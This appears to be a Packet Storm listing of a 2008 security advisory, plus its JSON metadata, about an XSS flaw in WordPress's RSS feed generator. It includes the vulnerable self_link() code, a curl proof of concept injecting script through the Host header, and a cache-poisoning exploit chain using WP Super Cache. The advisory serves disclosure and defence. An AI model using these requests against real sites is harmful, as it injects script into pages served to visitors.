Search...

wordpressrss-xss.txt

2008-11-25T00:00:00

ID PACKETSTORM:72277
Type packetstorm
Reporter Jeremias Reith
Modified 2008-11-25T00:00:00

Description

                                        
                                            `===== noXSS.org Security Advisory ======  
  
Advisory: WordPress XSS vulnerability in RSS Feed Generator  
Author: Jeremias Reith &lt;jr@noxss.org&gt;  
Published: 2008/11/25  
Affected: WordPress &lt; 2.6.5  
  
  
Summary  
=======  
  
WordPress prior to v2.6.3 fails to sanitize the Host header variable  
correctly when generating RSS feeds and is therefore prune to XSS  
attacks.  
  
Web Sites running in a name based virtual hosting setup are not  
affected as long as they are not the default virtual host.  
Moreover we only found installations running on the Apache web server  
to be affected.  
  
  
Vulnerability Details  
=====================  
  
The function self_link() in wp-includes/feed.php is used to generate  
absolute URLs for the &lt;atom:link&gt; tag in ATOM and RSS 2.0 feeds:  
  
function self_link() {  
echo 'http'  
. ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'  
. $_SERVER['HTTP_HOST']  
. wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);  
}  
  
The function does not sanitize the HTTP_HOST variable in any way but  
WordPress replaces all $_SERVER variables with escaped ones in  
wp-settings.php:  
  
$_SERVER = add_magic_quotes($_SERVER);  
  
In almost all setups add_magic_quotes() runs  
mysql_real_escape_string() over the elements and returns the modified  
array. Unfortunately this escaping method is not safe in markup  
context.  
  
  
PoC  
====  
  
The Apache web server only disallows '/', '\' and '..' within the host  
header. The header can therefore contain markup making the following  
PoC possible:  
  
curl -H "Host: \"&gt;&lt;body onload=alert(String.fromCharCode(88,83,83))&gt;" \  
http://www.example.org/blog/feed  
  
The given example request will return (without additional newlines):  
  
-- snip --  
...  
&lt;atom:link href="http://\"&gt;  
&lt;body onload=alert(String.fromCharCode(88,83,83))&gt;  
/blog/feed" rel="self" type="application/rss+xml" /&gt;  
...  
-- snip --  
  
The embedded JavaScript will be executed in Firefox 3.0.4 due to the  
triggered switch to Quirks mode.  
  
  
Exploit  
=======  
  
The following exploit is a semi-stored XSS attack and has been tested  
with the following setup:  
  
- Apache 2.x with IP based virtual hosting  
- Wordpress 2.6.3 installed in /blog/  
- WP Super Cache 0.84  
- Firefox 3.0.4  
  
  
WP Super Cache is a popular WordPress plugin that adds static file  
caching to WordPress. It greatly increases performance and is  
often used. It saves generated pages in the wp-content/cache directory  
and adds mod_rewrite rules to serve cached pages statically.  
  
Issuing a malicious request to a vulnerable WordPress installation  
will lead to a file containing the XSS to be generated and placed  
within the document root.  
  
Request:  
curl -H "Host: \"&gt;&lt;body onload=alert(String.fromCharCode(88,83,83))&gt;" \  
http://www.example.org/blog/feed  
  
Generated file:  
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html  
  
Firefox will execute the embedded JavaScript even tough the feed is  
XML because the file is served as text/html.  
  
The only missing the step is the calculation cached file's MD5 sum.  
  
The following code generates the MD5 checksum:  
  
php -r 'echo md5("\"&gt;&lt;body   
onload=alert(String.fromCharCode(88,83,83))&gt;".  
"/blog/feed"), "\n";'  
  
In the default setup the MD5 sum can be generated by concatenating the  
contents of HTTP_HOST and REQUEST_URI resulting in  
0d2ca4617758433a7864d57493be2c5b for the given example.  
  
This file can be accessed until the cache expiration mechanism removes  
it. The default expire time is 3600 seconds.  
  
  
Vendor Response  
===============  
2008-11-17 Reported to vendor  
2008-11-17 Initial response from vendor  
2008-11-25 Release of version 2.6.5  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:72277", "type": "packetstorm", "bulletinFamily": "exploit", "title": "wordpressrss-xss.txt", "description": "", "published": "2008-11-25T00:00:00", "modified": "2008-11-25T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/72277/wordpressrss-xss.txt.html", "reporter": "Jeremias Reith", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:03", "viewCount": 3, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:17:03", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:03", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/72277/wordpressrss-xss.txt", "sourceData": "`===== noXSS.org Security Advisory ====== \n \nAdvisory: WordPress XSS vulnerability in RSS Feed Generator \nAuthor: Jeremias Reith <jr@noxss.org> \nPublished: 2008/11/25 \nAffected: WordPress < 2.6.5 \n \n \nSummary \n======= \n \nWordPress prior to v2.6.3 fails to sanitize the Host header variable \ncorrectly when generating RSS feeds and is therefore prune to XSS \nattacks. \n \nWeb Sites running in a name based virtual hosting setup are not \naffected as long as they are not the default virtual host. \nMoreover we only found installations running on the Apache web server \nto be affected. \n \n \nVulnerability Details \n===================== \n \nThe function self_link() in wp-includes/feed.php is used to generate \nabsolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds: \n \nfunction self_link() { \necho 'http' \n. ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://' \n. $_SERVER['HTTP_HOST'] \n. wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1); \n} \n \nThe function does not sanitize the HTTP_HOST variable in any way but \nWordPress replaces all $_SERVER variables with escaped ones in \nwp-settings.php: \n \n$_SERVER = add_magic_quotes($_SERVER); \n \nIn almost all setups add_magic_quotes() runs \nmysql_real_escape_string() over the elements and returns the modified \narray. Unfortunately this escaping method is not safe in markup \ncontext. \n \n \nPoC \n==== \n \nThe Apache web server only disallows '/', '\\' and '..' within the host \nheader. The header can therefore contain markup making the following \nPoC possible: \n \ncurl -H \"Host: \\\"><body onload=alert(String.fromCharCode(88,83,83))>\" \\ \nhttp://www.example.org/blog/feed \n \nThe given example request will return (without additional newlines): \n \n-- snip -- \n... \n<atom:link href=\"http://\\\"> \n<body onload=alert(String.fromCharCode(88,83,83))> \n/blog/feed\" rel=\"self\" type=\"application/rss+xml\" /> \n... \n-- snip -- \n \nThe embedded JavaScript will be executed in Firefox 3.0.4 due to the \ntriggered switch to Quirks mode. \n \n \nExploit \n======= \n \nThe following exploit is a semi-stored XSS attack and has been tested \nwith the following setup: \n \n- Apache 2.x with IP based virtual hosting \n- Wordpress 2.6.3 installed in /blog/ \n- WP Super Cache 0.84 \n- Firefox 3.0.4 \n \n \nWP Super Cache is a popular WordPress plugin that adds static file \ncaching to WordPress. It greatly increases performance and is \noften used. It saves generated pages in the wp-content/cache directory \nand adds mod_rewrite rules to serve cached pages statically. \n \nIssuing a malicious request to a vulnerable WordPress installation \nwill lead to a file containing the XSS to be generated and placed \nwithin the document root. \n \nRequest: \ncurl -H \"Host: \\\"><body onload=alert(String.fromCharCode(88,83,83))>\" \\ \nhttp://www.example.org/blog/feed \n \nGenerated file: \nhttp://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html \n \nFirefox will execute the embedded JavaScript even tough the feed is \nXML because the file is served as text/html. \n \nThe only missing the step is the calculation cached file's MD5 sum. \n \nThe following code generates the MD5 checksum: \n \nphp -r 'echo md5(\"\\\"><body \nonload=alert(String.fromCharCode(88,83,83))>\". \n\"/blog/feed\"), \"\\n\";' \n \nIn the default setup the MD5 sum can be generated by concatenating the \ncontents of HTTP_HOST and REQUEST_URI resulting in \n0d2ca4617758433a7864d57493be2c5b for the given example. \n \nThis file can be accessed until the cache expiration mechanism removes \nit. The default expire time is 3600 seconds. \n \n \nVendor Response \n=============== \n2008-11-17 Reported to vendor \n2008-11-17 Initial response from vendor \n2008-11-25 Release of version 2.6.5 \n \n \n`\n", "immutableFields": []}